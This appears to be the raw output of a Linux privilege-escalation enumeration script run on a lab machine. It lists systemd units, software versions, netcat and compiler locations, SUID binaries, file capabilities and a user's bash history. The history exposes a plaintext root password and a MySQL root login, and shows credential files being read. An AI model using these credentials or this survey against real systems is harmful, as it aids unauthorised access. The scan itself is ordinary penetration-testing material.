lrwxrwxrwx 1 root root 32 Nov 27 00:39 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Nov 27 00:39 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Nov 27 00:39 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Nov 27 00:39 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Nov 27 00:39 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Nov 27 00:39 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Nov 27 00:39 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Nov 27 00:39 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Nov 27 00:39 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Nov 27 00:39 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Nov 27 00:39 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Nov 27 00:39 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 30 May  9  2018 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 May  9  2018 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Nov 27 00:39 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Nov 27 00:39 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Nov 27 00:39 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Nov 27 00:39 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Nov 27 00:39 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Nov 27 00:39 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jan 12  2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Nov 27 00:39 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/systemd-resolved.service.d:
total 4.0K
-rw-r--r-- 1 root root 200 Feb 21  2018 resolvconf.conf

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Feb 21  2018 disable-with-time-daemon.conf

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Nov 27 00:39 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Nov 27 00:39 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Nov 27 00:39 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Feb 21  2018 debian.conf

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Nov 27 00:39 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Nov 27 00:39 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Nov 27 00:39 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Mar 17  2016 hdparm

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Jul 30  2018 90-systemd.preset

/lib/systemd/system-generators:
total 668K
-rwxr-xr-x 1 root root  71K Jul 30  2018 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root  59K Jul 30  2018 systemd-dbus1-generator
-rwxr-xr-x 1 root root  35K Jul 30  2018 systemd-rc-local-generator
-rwxr-xr-x 1 root root  31K Jul 30  2018 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Jul 30  2018 systemd-sysv-generator
-rwxr-xr-x 1 root root  43K Jul 30  2018 systemd-debug-generator
-rwxr-xr-x 1 root root  79K Jul 30  2018 systemd-fstab-generator
-rwxr-xr-x 1 root root  39K Jul 30  2018 systemd-getty-generator
-rwxr-xr-x 1 root root 119K Jul 30  2018 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root  39K Jul 30  2018 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root  39K Jul 30  2018 systemd-insserv-generator

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Jul 30  2018 80-container-host0.network
-rw-r--r-- 1 root root 482 Jul 30  2018 80-container-ve.network
-rw-r--r-- 1 root root  80 Jul 30  2018 99-default.link

/lib/systemd/system-shutdown:
total 0


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] Sudo version:[00m
Sudo version 1.8.16


[00;31m[-] MYSQL version:[00m
mysql  Ver 14.14 Distrib 5.7.24, for Linux (x86_64) using  EditLine wrapper


[00;31m[-] Apache version:[00m
Server version: Apache/2.4.18 (Ubuntu)
Server built:   2018-06-07T19:43:03


[00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=help
APACHE_RUN_GROUP=help


[00;31m[-] Installed Apache modules:[00m
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php7_module (shared)
 setenvif_module (shared)
 status_module (shared)


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc


[00;31m[-] Installed compilers:[00m
ii  g++                                 4:5.3.1-1ubuntu1                           amd64        GNU C++ compiler
ii  g++-5                               5.4.0-6ubuntu1~16.04.10                    amd64        GNU C++ compiler
ii  gcc                                 4:5.3.1-1ubuntu1                           amd64        GNU C compiler
ii  gcc-5                               5.4.0-6ubuntu1~16.04.10                    amd64        GNU C compiler
ii  libllvm6.0:amd64                    1:6.0-1ubuntu2~16.04.1                     amd64        Modular compiler and toolchain technologies, runtime library
ii  libxkbcommon0:amd64                 0.5.0-1ubuntu2.1                           amd64        library interface to the XKB compiler - shared library


[00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1570 Nov 28 09:52 /etc/passwd
-rw-r--r-- 1 root root 806 Jan 11 06:04 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 1045 Nov 28 09:52 /etc/shadow


[00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 1038952 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 10624 May  8  2018 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 10104 Jan  1  2016 /usr/lib/s-nail/s-nail-privsep
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Nov  5 03:26 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 40152 May 16  2018 /bin/mount
-rwsr-xr-x 1 root root 27608 May 16  2018 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping


[00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root shadow 35600 Apr  9  2018 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Apr  9  2018 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root tty 14752 Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 27368 May 16  2018 /usr/bin/wall
-rwxr-sr-x 1 root ssh 358624 Nov  5 03:26 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 17  2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 May 16  2017 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr  5  2016 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 22768 May 16  2017 /usr/bin/expiry
-rwxr-sr-x 1 root utmp 434216 Feb  7  2016 /usr/bin/screen


[00;31m[+] Files with POSIX capabilities set:[00m
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] Current user's history files:[00m
-rw-rw-r-- 1 help help 906 Feb  7 10:59 /home/help/.bash_history
-rw------- 1 help help 442 Nov 28 04:46 /home/help/.mysql_history
-rw-rw-r-- 1 help help   2 Feb  7 10:44 /home/help/.node_repl_history


[00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/help/.bash_history
sudo mkdir lol
ls -la
cat .bash_history 
rm -rf .bash_history 
touch .bash_history
ls -la
su
su
rOOTmEoRdIE
su
MS'
exit
/
al
;
`
\
'
su
cd help
cd /help
cd  src
ls
cd graphql
ls
cd schema/
ls
cd resolvers/
ls
cat index.js 
cd
cd help
ls
npm run build
reboot
sudo shutdown
ls
cd 
cd ~
ls
clear
ls
ls -la
cat .mysql_history
cat .bash_history
ls
cd /var
ls
cd www
ls
cd html
ls
cd support
ls
ls -la
cd cat index.php
cat index.php
cd includes
ls
cat config.php
mysql -uroot -phelpme support
ps aux
netstat -tlpn
ls
cd
cd ~
ls
ls -la
cd .forever
ls
cat config.json
cd ..
ls
ls -la
cat load.conf
cat npm-debug.log
ls -la /usr/bin/npm
ls -la /usr/bin/share/npm/bin/npm-cli.js
ls
ls -la
cat .node_repl_history
cd .nano
ls
cd ..
ls -la
cat .bash_history
ls -la /etc/shadow
ls -la /etc/passwd
cd /tmp
#ls
ls -la
cd .bb
ls
cd ..
ls
ls -la
cat load.conf
cat help.c
uname -a
cat /etc/lsb-release
ls
ls -la
./help 
exit


[00;31m[-] Any interesting mail in /var/mail:[00m
total 52
drwxrwsr-x  2 root mail  4096 Feb  7 11:00 .
drwxr-xr-x 12 root root  4096 Nov 27 05:49 ..
-rw-rw----  1 help mail 39777 Feb  7 11:00 help


[00;33m### SCAN COMPLETE ####################################[00m
